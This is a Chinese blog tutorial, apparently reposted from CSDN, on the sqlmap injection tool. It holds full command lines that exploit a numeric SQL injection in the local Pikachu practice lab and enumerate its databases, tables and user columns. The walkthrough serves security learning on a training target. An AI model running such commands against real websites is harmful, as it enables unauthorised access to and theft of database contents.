【信息安全】-安全工具-sqlmap

sqlmap是一个自动化的sql注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞

1.安装

https://blog.csdn.net/u011781521/article/details/53909151

https://www.jianshu.com/p/3d3656be3c60

2.实验

在pikachu实验平台数字型注入中抓包,记录链接以及提交给服务器的参数

读取数据库

在cmd中进入sqlmap的安装目录,输入命令

D:\sqlmap\sqlmapproject-sqlmap-1.2.12-33-g9564c8e\sqlmapproject-sqlmap-9564c8e>//sqlmap的安装路径

python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=5&submit=%E6%9F%A5%E8%AF%A2" - f --dbms mysql --dbs --batch
 //-u 后面接测试链接
 // -data 提交给服务器的数据
 //--dbms 数据库类型为myslq数据库
 //--dbs 列出所有的数据库
 //--batch 该参数使用后不需要用户输入,默认提示走下去

成功获取到数据库名

读取表名

D:\sqlmap\sqlmapproject-sqlmap-1.2.12-33-g9564c8e\sqlmapproject-sqlmap-9564c8e>

python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=5&submit=%E6%9F%A5%E8%AF%A2"  --dbms mysql -D pikachu --tables --batch

//-D指定数据库
//--tables获取数据库中的表

成功获取表

 

读取列

D:\sqlmap\sqlmapproject-sqlmap-1.2.12-33-g9564c8e\sqlmapproject-sqlmap-9564c8e>

python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=5&submit=%E6%9F%A5%E8%AF%A2"  --dbms mysql -D pikachu -T users --columns --batch

//-D pikachu 指定数据库
//-T users 指定表名
//--columns 显式列

成功获取列

猜你喜欢

转载自blog.csdn.net/qq_39328436/article/details/114399837